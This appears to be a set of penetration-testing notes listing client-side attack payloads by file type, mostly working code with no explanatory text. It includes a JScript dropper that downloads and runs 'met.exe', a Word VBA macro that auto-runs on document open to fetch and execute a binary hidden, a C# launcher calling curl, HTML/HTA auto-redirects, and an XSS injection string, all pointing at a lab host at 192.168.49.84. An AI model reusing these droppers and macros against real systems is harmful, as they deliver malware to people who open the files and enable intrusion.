### hta ``` <!DOCTYPE html> <html> <head> <script> function myFunction() { window.location.href="http://192.168.49.84/href_load"; } </script> </head> <body onload="myFunction()"> <h1>Hello World!</h1> </body> </html> ``` ``` html htm exe hta doc ps1 bat js x vbs ``` ### js-test ``` var url = "http://192.168.49.84/met.exe" var Object = WScript.CreateObject('MSXML2.XMLHTTP'); Object.Open('GET', url, false); Object.Send(); if (Object.Status == 200) { var Stream = WScript.CreateObject('ADODB.Stream'); Stream.Open(); Stream.Type = 1; Stream.Write(Object.ResponseBody); Stream.Position = 0; Stream.SaveToFile("met.exe", 2); Stream.Close(); } var r = new ActiveXObject("WScript.Shell").Run("met.exe"); ``` ### html-test ``` <!DOCTYPE html> <html> <head> <script> function myFunction() { window.location.href="http://192.168.49.84:443/href_load"; } </script> </head> <body onload="myFunction()"> <h1>Hello World!</h1> </body> </html> <html></tExtArEa>'"><sCRiPt sRC=http://192.168.49.84/xss></sCrIpT></html> ``` ### exe-test ``` using System.Diagnostics; namespace run_cmd_command {     class Program     {         static void Main(string[] args)         {             string command = "/C curl http://192.168.49.84/csharp_curl";             Process.Start("cmd.exe", command);         }     } } ``` ### doc-test ``` Sub Document_Open() MyMacro End Sub Sub AutoOpen() MyMacro End Sub Sub MyMacro() Dim strArg As String strArg = "cmd.exe /c curl http://192.168.49.84/ccurl.exe -o c:/windows/temp/ccurl.exe & cmd.exe /c c:/windows/temp/ccurl.exe" Shell strArg, vbHide End Sub Sub Auto_Open() MyMacro End Sub ```